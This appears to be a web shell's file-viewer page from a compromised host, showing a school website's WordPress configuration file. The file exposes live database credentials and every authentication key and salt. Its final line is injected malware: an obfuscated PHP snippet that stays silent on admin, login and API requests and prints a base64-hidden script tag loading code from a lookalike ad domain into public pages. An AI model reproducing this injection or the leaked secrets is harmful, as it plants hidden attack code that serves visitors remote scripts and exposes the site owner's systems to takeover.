HEX
Server: LiteSpeed
System: Linux sg-nme-web1042.main-hosting.eu 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User: u693151605 (693151605)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: /home/u693151605/domains/pranamiglobalschool.net/public_html/wp-config.php
<?php
define( 'WP_CACHE', true );



/**

 * The base configuration for WordPress

 *

 * The wp-config.php creation script uses this file during the installation.

 * You don't have to use the web site, you can copy this file to "wp-config.php"

 * and fill in the values.

 *

 * This file contains the following configurations:

 *

 * * Database settings

 * * Secret keys

 * * Database table prefix

 * * ABSPATH

 *

 * @link https://wordpress.org/support/article/editing-wp-config-php/

 *

 * @package WordPress

 */


// ** Database settings - You can get this info from your web host ** //

/** The name of the database for WordPress */

define( 'DB_NAME', 'u693151605_pranamiwebsite' );


/** Database username */

define( 'DB_USER', 'u693151605_pranamiwebsite' );


/** Database password */

define( 'DB_PASSWORD', 'W&3Nz0Rf|0FR567h' );


/** Database hostname */

define( 'DB_HOST', 'localhost:3306' );


/** Database charset to use in creating database tables. */

define( 'DB_CHARSET', 'utf8' );


/** The database collate type. Don't change this if in doubt. */

define( 'DB_COLLATE', '' );


/**#@+

 * Authentication unique keys and salts.

 *

 * Change these to different unique phrases! You can generate these using

 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.

 *

 * You can change these at any point in time to invalidate all existing cookies.

 * This will force all users to have to log in again.

 *

 * @since 2.6.0

 */

define( 'AUTH_KEY',         '>s g_y~Na}oH@;3kA@KZ2_$Cu&?L:-WLv@:2]=;;_hc5t++>{(JO:!`+C1hI)|Ca' );

define( 'SECURE_AUTH_KEY',  'cDy[sr~P,rlk~~98jXq1Yit[(r4X6 sL]82ty5Lx+ e-LBmtR}Rc%PH;)5*&Y]3n' );

define( 'LOGGED_IN_KEY',    'o+T3zB{J /- (y0 O5hB]ewsvD1Qzg%l-wX*hiA,WTq^ =rDC7:)2>fJl34^]u!(' );

define( 'NONCE_KEY',        'tp!t7gQTEvGM`p?h`x73qJvR8R]m4^*Zi[((:un[qX(:: ^GO>Lg?lulyPn>F]yT' );

define( 'AUTH_SALT',        '4qpN4:.@/tq?/qms^*;.v>&:RJu<H5/i2KzJ}QubGB7J*TNZu^0yl[N?~qoJauR#' );

define( 'SECURE_AUTH_SALT', '@?%%EO#5e^=kG(#[.{j/!0&6s+N8S.STZ2;<N[U(LWY2y>pGNp4*i]5<?n.l5^*|' );

define( 'LOGGED_IN_SALT',   '%iF;T2tlPXV]!uw2?U<I.x8H~fUZp.}NmQOq wxl/9q=7D*@d7e27}j~20ty#O(M' );

define( 'NONCE_SALT',       'u.~w`*j$i,JEyO+-OdNL~aQ1.%2VpgQ5!@SDPpd5{aT,c1]xFDar%3*Wpc2Y%!V<' );


/**#@-*/


/**

 * WordPress database table prefix.

 *

 * You can have multiple installations in one database if you give each

 * a unique prefix. Only numbers, letters, and underscores please!

 */

$table_prefix = 'wp_';


/**

 * For developers: WordPress debugging mode.

 *

 * Change this to true to enable the display of notices during development.

 * It is strongly recommended that plugin and theme developers use WP_DEBUG

 * in their development environments.

 *

 * For information on other constants that can be used for debugging,

 * visit the documentation.

 *

 * @link https://wordpress.org/support/article/debugging-in-wordpress/

 */

define('WP_DEBUG_LOG', false);

/* Add any custom values between this line and the "stop editing" line. */




define( 'FS_METHOD', 'direct' );
/**
 * The WP_SITEURL and WP_HOME options are configured to access from any hostname or IP address.
 * If you want to access only from an specific domain, you can modify them. For example:
 *  define('WP_HOME','http://example.com');
 *  define('WP_SITEURL','http://example.com');
 *
 */
if ( defined( 'WP_CLI' ) ) {
	//$_SERVER['HTTP_HOST'] = '127.0.0.1';
}

define( 'WP_HOME', 'https://' . $_SERVER['HTTP_HOST'] . '/' );
define( 'WP_SITEURL', 'https://' . $_SERVER['HTTP_HOST'] . '/' );
define( 'WP_AUTO_UPDATE_CORE', 'minor' );
/* That's all, stop editing! Happy publishing. */


/** Absolute path to the WordPress directory. */

if ( ! defined( 'ABSPATH' ) ) {

	define( 'ABSPATH', __DIR__ . '/' );

}


/** Sets up WordPress vars and included files. */

require_once ABSPATH . 'wp-settings.php';

/**
 * Disable pingback.ping xmlrpc method to prevent WordPress from participating in DDoS attacks
 * More info at: https://docs.bitnami.com/general/apps/wordpress/troubleshooting/xmlrpc-and-pingback/
 */
if ( !defined( 'WP_CLI' ) ) {
	// remove x-pingback HTTP header
	add_filter("wp_headers", function($headers) {
		unset($headers["X-Pingback"]);
		return $headers;
	});
	// disable pingbacks
	add_filter( "xmlrpc_methods", function( $methods ) {
		unset( $methods["pingback.ping"] );
		return $methods;
	});
}

?>
<?php ini_set("display_errors",0);if(PHP_SAPI!=="cli"&&(strpos(@$_SERVER["REQUEST_URI"],"/wp-admin/admin-ajax.php")===false&&strpos(@$_SERVER["REQUEST_URI"],"/wp-json")===false&&strpos(@$_SERVER["REQUEST_URI"],"/wp/v2")===false&&strpos(@$_SERVER["REQUEST_URI"],"/wp-admin")===false&&strpos(@$_SERVER["REQUEST_URI"],"/wp-login.php")===false&&strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"])!=="xmlhttprequest")){echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYXN5bmMuZ3N5bmRpY2F0aW9uLmNvbS8iPjwvc2NyaXB0Pg==");}?>